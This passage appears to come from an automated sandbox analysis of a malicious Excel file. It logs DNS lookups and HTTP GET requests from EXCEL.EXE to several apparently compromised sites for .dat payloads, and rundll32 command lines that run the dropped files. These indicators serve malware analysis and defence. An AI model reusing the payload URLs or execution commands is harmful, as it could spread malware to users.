                        Feb 23, 2021 15:50:14.123610973 CET804917272.52.227.180192.168.2.22
                        Feb 23, 2021 15:50:14.123636961 CET804917272.52.227.180192.168.2.22
                        Feb 23, 2021 15:50:14.123801947 CET4917280192.168.2.2272.52.227.180
                        Feb 23, 2021 15:50:14.124448061 CET4917280192.168.2.2272.52.227.180
                        Feb 23, 2021 15:50:14.284929991 CET804917272.52.227.180192.168.2.22
                        Feb 23, 2021 15:50:14.309663057 CET4917380192.168.2.2268.66.216.42
                        Feb 23, 2021 15:50:14.461277008 CET804917368.66.216.42192.168.2.22
                        Feb 23, 2021 15:50:14.461366892 CET4917380192.168.2.2268.66.216.42
                        Feb 23, 2021 15:50:14.462505102 CET4917380192.168.2.2268.66.216.42
                        Feb 23, 2021 15:50:14.613990068 CET804917368.66.216.42192.168.2.22
                        Feb 23, 2021 15:50:14.927211046 CET804917368.66.216.42192.168.2.22
                        Feb 23, 2021 15:50:14.927350044 CET4917380192.168.2.2268.66.216.42
                        Feb 23, 2021 15:50:18.611938953 CET804917368.66.216.42192.168.2.22
                        Feb 23, 2021 15:50:18.612014055 CET4917380192.168.2.2268.66.216.42
                        Feb 23, 2021 15:50:42.055811882 CET8049166162.241.80.6192.168.2.22
                        Feb 23, 2021 15:50:43.606271982 CET8049167138.36.237.100192.168.2.22
                        Feb 23, 2021 15:52:05.062410116 CET4917380192.168.2.2268.66.216.42
                        Feb 23, 2021 15:52:05.467545033 CET4917380192.168.2.2268.66.216.42
                        Feb 23, 2021 15:52:06.278798103 CET4917380192.168.2.2268.66.216.42
                        Feb 23, 2021 15:52:07.885788918 CET4917380192.168.2.2268.66.216.42
                        Feb 23, 2021 15:52:11.099622965 CET4917380192.168.2.2268.66.216.42
                        Feb 23, 2021 15:52:17.511773109 CET4917380192.168.2.2268.66.216.42

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Feb 23, 2021 15:50:05.148121119 CET5219753192.168.2.228.8.8.8
                        Feb 23, 2021 15:50:05.314361095 CET53521978.8.8.8192.168.2.22
                        Feb 23, 2021 15:50:05.989708900 CET5309953192.168.2.228.8.8.8
                        Feb 23, 2021 15:50:06.056046009 CET53530998.8.8.8192.168.2.22
                        Feb 23, 2021 15:50:07.077124119 CET5283853192.168.2.228.8.8.8
                        Feb 23, 2021 15:50:07.369729042 CET53528388.8.8.8192.168.2.22
                        Feb 23, 2021 15:50:09.896291018 CET6120053192.168.2.228.8.8.8
                        Feb 23, 2021 15:50:09.947890997 CET53612008.8.8.8192.168.2.22
                        Feb 23, 2021 15:50:09.955142975 CET4954853192.168.2.228.8.8.8
                        Feb 23, 2021 15:50:10.006742001 CET53495488.8.8.8192.168.2.22
                        Feb 23, 2021 15:50:10.207190037 CET5562753192.168.2.228.8.8.8
                        Feb 23, 2021 15:50:10.257096052 CET53556278.8.8.8192.168.2.22
                        Feb 23, 2021 15:50:10.273158073 CET5600953192.168.2.228.8.8.8
                        Feb 23, 2021 15:50:10.326050043 CET53560098.8.8.8192.168.2.22
                        Feb 23, 2021 15:50:10.631937981 CET6186553192.168.2.228.8.8.8
                        Feb 23, 2021 15:50:10.693800926 CET53618658.8.8.8192.168.2.22
                        Feb 23, 2021 15:50:10.700963974 CET5517153192.168.2.228.8.8.8
                        Feb 23, 2021 15:50:10.762469053 CET53551718.8.8.8192.168.2.22
                        Feb 23, 2021 15:50:14.142929077 CET5249653192.168.2.228.8.8.8
                        Feb 23, 2021 15:50:14.307647943 CET53524968.8.8.8192.168.2.22

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Feb 23, 2021 15:50:05.148121119 CET192.168.2.228.8.8.80xfda2Standard query (0)rzminc.comA (IP address)IN (0x0001)
                        Feb 23, 2021 15:50:05.989708900 CET192.168.2.228.8.8.80x5115Standard query (0)pathinanchilearthmovers.comA (IP address)IN (0x0001)
                        Feb 23, 2021 15:50:07.077124119 CET192.168.2.228.8.8.80x78b6Standard query (0)jugueterialatorre.com.arA (IP address)IN (0x0001)
                        Feb 23, 2021 15:50:09.896291018 CET192.168.2.228.8.8.80xed69Standard query (0)crt.sectigo.comA (IP address)IN (0x0001)
                        Feb 23, 2021 15:50:09.955142975 CET192.168.2.228.8.8.80x73f5Standard query (0)crt.sectigo.comA (IP address)IN (0x0001)
                        Feb 23, 2021 15:50:14.142929077 CET192.168.2.228.8.8.80x4b51Standard query (0)biblicalisraeltours.comA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Feb 23, 2021 15:50:05.314361095 CET8.8.8.8192.168.2.220xfda2No error (0)rzminc.com72.52.227.180A (IP address)IN (0x0001)
                        Feb 23, 2021 15:50:06.056046009 CET8.8.8.8192.168.2.220x5115No error (0)pathinanchilearthmovers.com162.241.80.6A (IP address)IN (0x0001)
                        Feb 23, 2021 15:50:07.369729042 CET8.8.8.8192.168.2.220x78b6No error (0)jugueterialatorre.com.ar138.36.237.100A (IP address)IN (0x0001)
                        Feb 23, 2021 15:50:09.947890997 CET8.8.8.8192.168.2.220xed69No error (0)crt.sectigo.com91.199.212.52A (IP address)IN (0x0001)
                        Feb 23, 2021 15:50:10.006742001 CET8.8.8.8192.168.2.220x73f5No error (0)crt.sectigo.com91.199.212.52A (IP address)IN (0x0001)
                        Feb 23, 2021 15:50:14.307647943 CET8.8.8.8192.168.2.220x4b51No error (0)biblicalisraeltours.com68.66.216.42A (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • rzminc.com
                        • pathinanchilearthmovers.com
                        • jugueterialatorre.com.ar
                        • biblicalisraeltours.com

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.224916572.52.227.18080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        TimestampkBytes transferredDirectionData
                        Feb 23, 2021 15:50:05.491146088 CET0OUTGET /xklyulyijvn/44250659496064800000.dat HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: rzminc.com
                        Connection: Keep-Alive
                        Feb 23, 2021 15:50:05.969320059 CET1INHTTP/1.1 200 OK
                        Date: Tue, 23 Feb 2021 14:50:05 GMT
                        Server: Apache/2.4.46 (CentOS)
                        X-Powered-By: PHP/7.3.27
                        Upgrade: h2
                        Connection: keep-alive, close
                        Cache-Control: private, must-revalidate
                        Expires: Tue, 23 Feb 2021 14:50:05 GMT
                        Content-Length: 0
                        Content-Type: text/html; charset=UTF-8


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.2249166162.241.80.680C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        TimestampkBytes transferredDirectionData
                        Feb 23, 2021 15:50:06.221399069 CET2OUTGET /eznwcdhx/44250659496064800000.dat HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: pathinanchilearthmovers.com
                        Connection: Keep-Alive
                        Feb 23, 2021 15:50:07.055249929 CET2INHTTP/1.1 200 OK
                        Date: Tue, 23 Feb 2021 14:50:06 GMT
                        Server: Apache
                        Upgrade: h2,h2c
                        Connection: Upgrade, Keep-Alive
                        Cache-Control: max-age=300
                        Expires: Tue, 23 Feb 2021 14:55:06 GMT
                        Accept-Ranges: none
                        X-Endurance-Cache-Level: 2
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=75
                        Content-Type: text/html; charset=UTF-8


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        2192.168.2.2249167138.36.237.10080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        TimestampkBytes transferredDirectionData
                        Feb 23, 2021 15:50:07.657131910 CET3OUTGET /xjzpfwc/44250659496064800000.dat HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: jugueterialatorre.com.ar
                        Connection: Keep-Alive
                        Feb 23, 2021 15:50:08.604717016 CET4INHTTP/1.1 301 Moved Permanently
                        Date: Tue, 23 Feb 2021 14:50:07 GMT
                        Server: Apache
                        X-Powered-By: PHP/7.3.20
                        Set-Cookie: e34c2f879dc85bcd47ed95fb5d2ec3c0=6b585f561c89b34e8ff5fc9bc8212736; path=/; secure; HttpOnly
                        Expires: Wed, 17 Aug 2005 00:00:00 GMT
                        Last-Modified: Tue, 23 Feb 2021 14:50:08 GMT
                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                        Pragma: no-cache
                        Location: https://jugueterialatorre.com.ar/xjzpfwc/44250659496064800000.dat
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Transfer-Encoding: chunked
                        Content-Type: text/html; charset=utf-8
                        Feb 23, 2021 15:50:08.604767084 CET4INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        3192.168.2.224917272.52.227.18080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        TimestampkBytes transferredDirectionData
                        Feb 23, 2021 15:50:13.655874968 CET92OUTGET /fdzgprclatqo/44250659496064800000.dat HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: rzminc.com
                        Connection: Keep-Alive
                        Feb 23, 2021 15:50:14.123610973 CET120INHTTP/1.1 200 OK
                        Date: Tue, 23 Feb 2021 14:50:13 GMT
                        Server: Apache/2.4.46 (CentOS)
                        X-Powered-By: PHP/7.3.27
                        Upgrade: h2
                        Connection: keep-alive, close
                        Cache-Control: private, must-revalidate
                        Expires: Tue, 23 Feb 2021 14:50:13 GMT
                        Content-Length: 0
                        Content-Type: text/html; charset=UTF-8


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        4192.168.2.224917368.66.216.4280C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        TimestampkBytes transferredDirectionData
                        Feb 23, 2021 15:50:14.462505102 CET121OUTGET /otmchxmxeg/44250659496064800000.dat HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: biblicalisraeltours.com
                        Connection: Keep-Alive
                        Feb 23, 2021 15:50:14.927211046 CET122INHTTP/1.1 200 OK
                        Connection: Keep-Alive
                        X-Powered-By: PHP/7.4.14
                        Content-Type: text/html; charset=UTF-8
                        Content-Length: 0
                        Date: Tue, 23 Feb 2021 14:50:14 GMT
                        Server: LiteSpeed
                        Strict-Transport-Security: max-age=63072000; includeSubDomains
                        X-Frame-Options: SAMEORIGIN
                        X-Content-Type-Options: nosniff
                        Content-Security-Policy: upgrade-insecure-requests
                        X-XSS-Protection: 1; mode=block
                        Referrer-Policy: no-referrer-when-downgrade


                        HTTPS Packets

                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                        Feb 23, 2021 15:50:09.204065084 CET138.36.237.100443192.168.2.2249168CN=jugueterialatorre.com.ar CN=RapidSSL RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Jun 02 02:00:00 CEST 2020 Mon Nov 06 13:23:33 CET 2017Thu Jun 03 01:59:59 CEST 2021 Sat Nov 06 13:23:33 CET 2027771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                        CN=RapidSSL RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Nov 06 13:23:33 CET 2017Sat Nov 06 13:23:33 CET 2027

                        Code Manipulations

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Start time:15:49:37
                        Start date:23/02/2021
                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        Wow64 process (32bit):false
                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                        Imagebase:0x13f380000
                        File size:27641504 bytes
                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:15:49:50
                        Start date:23/02/2021
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32 ..\JDFR.hdfgr,DllRegisterServer
                        Imagebase:0xff8d0000
                        File size:45568 bytes
                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:15:49:50
                        Start date:23/02/2021
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32 ..\JDFR.hdfgr1,DllRegisterServer
                        Imagebase:0xff8d0000
                        File size:45568 bytes
                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:15:49:51
                        Start date:23/02/2021
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32 ..\JDFR.hdfgr2,DllRegisterServer
                        Imagebase:0xff8d0000
                        File size:45568 bytes
                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:15:49:51
                        Start date:23/02/2021
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32 ..\JDFR.hdfgr3,DllRegisterServer
                        Imagebase:0xff8d0000
                        File size:45568 bytes
                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:15:49:52
                        Start date:23/02/2021
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32 ..\JDFR.hdfgr4,DllRegisterServer
                        Imagebase:0xff8d0000
                        File size:45568 bytes
                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Disassembly

                        Code Analysis

                        Reset < >